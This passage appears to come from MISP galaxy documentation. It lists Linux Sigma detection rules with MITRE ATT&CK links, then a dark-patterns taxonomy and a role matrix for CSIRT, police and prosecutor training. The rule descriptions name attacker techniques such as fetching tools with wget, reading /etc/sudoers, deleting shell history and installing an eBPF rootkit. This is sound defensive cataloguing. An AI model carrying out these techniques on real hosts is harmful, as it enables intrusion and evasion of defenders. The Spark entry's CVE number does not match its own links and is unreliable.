https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml

ESXi Admin Permission Assigned To Account Via ESXCLI

Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.

The tag is: misp-galaxy:sigma-rules="ESXi Admin Permission Assigned To Account Via ESXCLI"

Table 11661. Table References

Links

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml

Container Residence Discovery Via Proc Virtual FS

Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem

The tag is: misp-galaxy:sigma-rules="Container Residence Discovery Via Proc Virtual FS"

Container Residence Discovery Via Proc Virtual FS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11662. Table References

Links

https://blog.skyplabs.net/posts/container-detection/

https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml

Mount Execution With Hidepid Parameter

Detects execution of the "mount" command with the "hidepid" parameter, which hides processes from other users on the system

The tag is: misp-galaxy:sigma-rules="Mount Execution With Hidepid Parameter"

Mount Execution With Hidepid Parameter has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

Table 11663. Table References

Links

https://blogs.blackberry.com/

https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/

https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml

Download File To Potentially Suspicious Directory Via Wget

Detects the use of wget to download content to a suspicious directory

The tag is: misp-galaxy:sigma-rules="Download File To Potentially Suspicious Directory Via Wget"

Download File To Potentially Suspicious Directory Via Wget has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11664. Table References

Links

https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection

https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml

Linux Doas Tool Execution

Detects execution of the doas tool on a Linux host. This utility allows standard users to perform tasks as root, the same way sudo does.

The tag is: misp-galaxy:sigma-rules="Linux Doas Tool Execution"

Linux Doas Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 11665. Table References

Links

https://www.makeuseof.com/how-to-install-and-use-doas/

https://research.splunk.com/endpoint/linux_doas_tool_execution/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml

History File Deletion

Detects events in which a history file gets deleted, e.g. ~/.bash_history, to remove traces of malicious activity

The tag is: misp-galaxy:sigma-rules="History File Deletion"

History File Deletion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 11666. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md

https://github.com/sleventyeleven/linuxprivchecker/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml

Cat Sudoers

Detects the execution of a cat /etc/sudoers to list all users that have sudo rights

The tag is: misp-galaxy:sigma-rules="Cat Sudoers"

Cat Sudoers has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004" with estimative-language:likelihood-probability="almost-certain"

Table 11667. Table References

Links

https://github.com/sleventyeleven/linuxprivchecker/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml

Suspicious Git Clone - Linux

Detects execution of "git" to clone a remote repository whose name contains suspicious keywords

The tag is: misp-galaxy:sigma-rules="Suspicious Git Clone - Linux"

Suspicious Git Clone - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1593.003" with estimative-language:likelihood-probability="almost-certain"

Table 11668. Table References

Links

https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml

Setuid and Setgid

Detects suspicious change of file privileges with chown and chmod commands

The tag is: misp-galaxy:sigma-rules="Setuid and Setgid"

Setuid and Setgid has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001" with estimative-language:likelihood-probability="almost-certain"

Table 11669. Table References

Links

https://attack.mitre.org/techniques/T1548/001/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml

Apache Spark Shell Command Injection - ProcessCreation

Detects attempts to exploit an Apache Spark server via CVE-2014-6287 from a command-line perspective

The tag is: misp-galaxy:sigma-rules="Apache Spark Shell Command Injection - ProcessCreation"

Apache Spark Shell Command Injection - ProcessCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11670. Table References

Links

https://github.com/apache/spark/pull/36315/files

https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html

https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml

Potential GobRAT File Discovery Via Grep

Detects the use of grep to discover specific files created by the GobRAT malware

The tag is: misp-galaxy:sigma-rules="Potential GobRAT File Discovery Via Grep"

Potential GobRAT File Discovery Via Grep has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11671. Table References

Links

https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml

Potentially Suspicious Execution From Tmp Folder

Detects a potentially suspicious execution of a process located in the '/tmp/' folder

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Execution From Tmp Folder"

Potentially Suspicious Execution From Tmp Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 11672. Table References

Links

https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection

https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml

Local Groups Discovery - Linux

Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings

The tag is: misp-galaxy:sigma-rules="Local Groups Discovery - Linux"

Local Groups Discovery - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 11673. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml

Triple Cross eBPF Rootkit Install Commands

Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script

The tag is: misp-galaxy:sigma-rules="Triple Cross eBPF Rootkit Install Commands"

Triple Cross eBPF Rootkit Install Commands has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 11675. Table References

Links

https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml

Security Software Discovery - Linux

Detects usage of system utilities (only grep and egrep for now) to discover security software

The tag is: misp-galaxy:sigma-rules="Security Software Discovery - Linux"

Security Software Discovery - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 11676. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml

Dark Patterns

Dark Patterns are user interfaces that trick users into making decisions that benefit the interface's holder at the expense of the user.

Dark Patterns is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Jean-Louis Huynen

Nagging

Repeated requests to do something the firm prefers

The tag is: misp-galaxy:social-dark-patterns="Nagging"

Table 11677. Table References

Links

https://dl.acm.org/citation.cfm?id=3174108

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Activity Messages

Misleading notice about other consumers' actions

The tag is: misp-galaxy:social-dark-patterns="Activity Messages"

Table 11678. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Testimonials

Misleading statements from customers

The tag is: misp-galaxy:social-dark-patterns="Testimonials"

Table 11679. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Roach Motel

Asymmetry between signing up and canceling

The tag is: misp-galaxy:social-dark-patterns="Roach Motel"

Table 11680. Table References

Links

https://dl.acm.org/citation.cfm?id=3174108

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Intermediate Currency

Purchases in virtual currency to obscure cost

The tag is: misp-galaxy:social-dark-patterns="Intermediate Currency"

Table 11682. Table References

Links

https://www.darkpatterns.org/

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Hidden subscription / forced continuity

Unanticipated / undesired automatic renewal

The tag is: misp-galaxy:social-dark-patterns="Hidden subscription / forced continuity"

Table 11685. Table References

Links

https://www.darkpatterns.org/

https://dl.acm.org/citation.cfm?id=3174108

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Bait & Switch

Customer sold something other than what’s originally advertised

The tag is: misp-galaxy:social-dark-patterns="Bait & Switch"

Table 11686. Table References

Links

https://dl.acm.org/citation.cfm?id=3174108

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Hidden information / aesthetic manipulation / false hierarchy

Important information visually obscured

The tag is: misp-galaxy:social-dark-patterns="Hidden information / aesthetic manipulation / false hierarchy"

Table 11687. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Preselection

Firm-friendly default is preselected

The tag is: misp-galaxy:social-dark-patterns="Preselection"

Table 11688. Table References

Links

https://petsymposium.org/2016/files/papers/Tales_from_the_Dark_SidePrivacy_Dark_Strategies_and_Privacy_Dark_Patterns.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Toying with emotion

Emotionally manipulative framing

The tag is: misp-galaxy:social-dark-patterns="Toying with emotion"

Table 11689. Table References

Links

https://dl.acm.org/citation.cfm?id=3174108

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Trick questions

Intentional or obvious ambiguity

The tag is: misp-galaxy:social-dark-patterns="Trick questions"

Table 11690. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://dl.acm.org/citation.cfm?id=3174108

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Disguised Ad

Consumer induced to click on something that isn't an apparent ad

The tag is: misp-galaxy:social-dark-patterns="Disguised Ad"

Table 11691. Table References

Links

https://dl.acm.org/citation.cfm?id=3174108

https://www.darkpatterns.org/types-of-dark-pattern

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Confirmshaming

Choice framed in a way that makes declining seem dishonest or stupid

The tag is: misp-galaxy:social-dark-patterns="Confirmshaming"

Table 11692. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://www.darkpatterns.org/types-of-dark-pattern

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Forced Registration

Consumer tricked into thinking registration necessary

The tag is: misp-galaxy:social-dark-patterns="Forced Registration"

Table 11693. Table References

Links

https://petsymposium.org/2016/files/papers/Tales_from_the_Dark_SidePrivacy_Dark_Strategies_and_Privacy_Dark_Patterns.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Low stock / high-demand message

Consumer falsely informed of limited quantities

The tag is: misp-galaxy:social-dark-patterns="Low stock / high-demand message"

Table 11694. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Countdown timer / Limited time message

Opportunity ends soon, with a blatantly false visual cue

The tag is: misp-galaxy:social-dark-patterns="Countdown timer / Limited time message"

Table 11695. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

SoD Matrix

SOD Matrix.

SoD Matrix is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Koen Van Impe

Delivering training - CSIRT - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - CSIRT - [R]"

Delivering training - CSIRT - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - CSIRT - [C]"

Delivering training - CSIRT - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - CSIRT - [I]"

Delivering training - CSIRT - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - CSIRT - [S]"

Delivering training - LEA - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - LEA - [R]"

Delivering training - LEA - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - LEA - [C]"

Delivering training - LEA - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - LEA - [I]"

Delivering training - LEA - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - LEA - [S]"

Delivering training - Judiciary - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Judiciary - [R]"

Delivering training - Judiciary - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Judiciary - [C]"

Delivering training - Judiciary - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Judiciary - [I]"

Delivering training - Judiciary - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Judiciary - [S]"

Delivering training - Prosecutors - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Prosecutors - [R]"

Delivering training - Prosecutors - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Prosecutors - [C]"

Delivering training - Prosecutors - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Prosecutors - [I]"

Delivering training - Prosecutors - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Prosecutors - [S]"

Participating in training - CSIRT - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - CSIRT - [R]"

Participating in training - CSIRT - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - CSIRT - [C]"

Participating in training - CSIRT - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - CSIRT - [I]"

Participating in training - CSIRT - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - CSIRT - [S]"

Participating in training - LEA - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - LEA - [R]"

Participating in training - LEA - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - LEA - [C]"

Participating in training - LEA - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - LEA - [I]"

Participating in training - LEA - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - LEA - [S]"

Participating in training - Judiciary - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Judiciary - [R]"

Participating in training - Judiciary - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Judiciary - [C]"

Participating in training - Judiciary - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Judiciary - [I]"

Participating in training - Judiciary - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Judiciary - [S]"

Participating in training - Prosecutors - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Prosecutors - [R]"

Participating in training - Prosecutors - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Prosecutors - [C]"

Participating in training - Prosecutors - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Prosecutors - [I]"

Participating in training - Prosecutors - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Prosecutors - [S]"

Collecting cyber threat intelligence - CSIRT - [R]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - CSIRT - [R]"

Collecting cyber threat intelligence - CSIRT - [C]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - CSIRT - [C]"

Collecting cyber threat intelligence - CSIRT - [I]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - CSIRT - [I]"

Collecting cyber threat intelligence - CSIRT - [S]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - CSIRT - [S]"

Collecting cyber threat intelligence - LEA - [R]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - LEA - [R]"

Collecting cyber threat intelligence - LEA - [C]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - LEA - [C]"

Collecting cyber threat intelligence - LEA - [I]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - LEA - [I]"

Collecting cyber threat intelligence - LEA - [S]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - LEA - [S]"

Collecting cyber threat intelligence - Prosecutors - [R]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - Prosecutors - [R]"

Collecting cyber threat intelligence - Prosecutors - [C]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - Prosecutors - [C]"

Collecting cyber threat intelligence - Prosecutors - [I]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - Prosecutors - [I]"

Collecting cyber threat intelligence - Prosecutors - [S]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - Prosecutors - [S]"

Analysis of vulnerabilities and threats - CSIRT - [R]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - CSIRT - [R]"

Analysis of vulnerabilities and threats - CSIRT - [C]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - CSIRT - [C]"

Analysis of vulnerabilities and threats - CSIRT - [I]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - CSIRT - [I]"

Analysis of vulnerabilities and threats - CSIRT - [S]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - CSIRT - [S]"

Analysis of vulnerabilities and threats - LEA - [R]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - LEA - [R]"

Analysis of vulnerabilities and threats - LEA - [C]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - LEA - [C]"

Analysis of vulnerabilities and threats - LEA - [I]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - LEA - [I]"

Analysis of vulnerabilities and threats - LEA - [S]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - LEA - [S]"

Analysis of vulnerabilities and threats - Prosecutors - [R]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - Prosecutors - [R]"

Analysis of vulnerabilities and threats - Prosecutors - [C]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - Prosecutors - [C]"

Analysis of vulnerabilities and threats - Prosecutors - [I]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - Prosecutors - [I]"

Analysis of vulnerabilities and threats - Prosecutors - [S]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - Prosecutors - [S]"

Issuing recommendations for new vulnerabilities and threats - CSIRT - [R]

Dealing with specific types of threats and vulnerabilities

The tag is: misp-galaxy:sod-matrix="Issuing recommendations for new vulnerabilities and threats - CSIRT - [R]"

Issuing recommendations for new vulnerabilities and threats - CSIRT - [C]

Dealing with specific types of threats and vulnerabilities

The tag is: misp-galaxy:sod-matrix="Issuing recommendations for new vulnerabilities and threats - CSIRT - [C]"

Issuing recommendations for new vulnerabilities and threats - CSIRT - [I]

Dealing with specific types of threats and vulnerabilities

The tag is: misp-galaxy:sod-matrix="Issuing recommendations for new vulnerabilities and threats - CSIRT - [I]"

Issuing recommendations for new vulnerabilities and threats - CSIRT - [S]

Dealing with specific types of threats and vulnerabilities

The tag is: misp-galaxy:sod-matrix="Issuing recommendations for new vulnerabilities and threats - CSIRT - [S]"

Advising potential victims on preventive measures against cybercrime - CSIRT - [R]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - CSIRT - [R]"

Advising potential victims on preventive measures against cybercrime - CSIRT - [C]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - CSIRT - [C]"

Advising potential victims on preventive measures against cybercrime - CSIRT - [I]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - CSIRT - [I]"

Advising potential victims on preventive measures against cybercrime - CSIRT - [S]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - CSIRT - [S]"

Advising potential victims on preventive measures against cybercrime - LEA - [R]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - LEA - [R]"

Advising potential victims on preventive measures against cybercrime - LEA - [C]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - LEA - [C]"

Advising potential victims on preventive measures against cybercrime - LEA - [I]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - LEA - [I]"

Advising potential victims on preventive measures against cybercrime - LEA - [S]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - LEA - [S]"

Discovery of the cyber security incident/crime - CSIRT - [R]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - CSIRT - [R]"

Discovery of the cyber security incident/crime - CSIRT - [C]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - CSIRT - [C]"

Discovery of the cyber security incident/crime - CSIRT - [I]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - CSIRT - [I]"

Discovery of the cyber security incident/crime - CSIRT - [S]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - CSIRT - [S]"

Discovery of the cyber security incident/crime - LEA - [R]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - LEA - [R]"

Discovery of the cyber security incident/crime - LEA - [C]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - LEA - [C]"

Discovery of the cyber security incident/crime - LEA - [I]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - LEA - [I]"

Discovery of the cyber security incident/crime - LEA - [S]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - LEA - [S]"

Identification and classification of the cyber security incident/crime - CSIRT - [R]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - CSIRT - [R]"

Identification and classification of the cyber security incident/crime - CSIRT - [C]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - CSIRT - [C]"

Identification and classification of the cyber security incident/crime - CSIRT - [I]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - CSIRT - [I]"

Identification and classification of the cyber security incident/crime - CSIRT - [S]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - CSIRT - [S]"

Identification and classification of the cyber security incident/crime - LEA - [R]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - LEA - [R]"

Identification and classification of the cyber security incident/crime - LEA - [C]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - LEA - [C]"

Identification and classification of the cyber security incident/crime - LEA - [I]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - LEA - [I]"

Identification and classification of the cyber security incident/crime - LEA - [S]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - LEA - [S]"

Identification and classification of the cyber security incident/crime - Prosecutors - [R]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - Prosecutors - [R]"

Identification and classification of the cyber security incident/crime - Prosecutors - [C]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - Prosecutors - [C]"

Identification and classification of the cyber security incident/crime - Prosecutors - [I]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - Prosecutors - [I]"

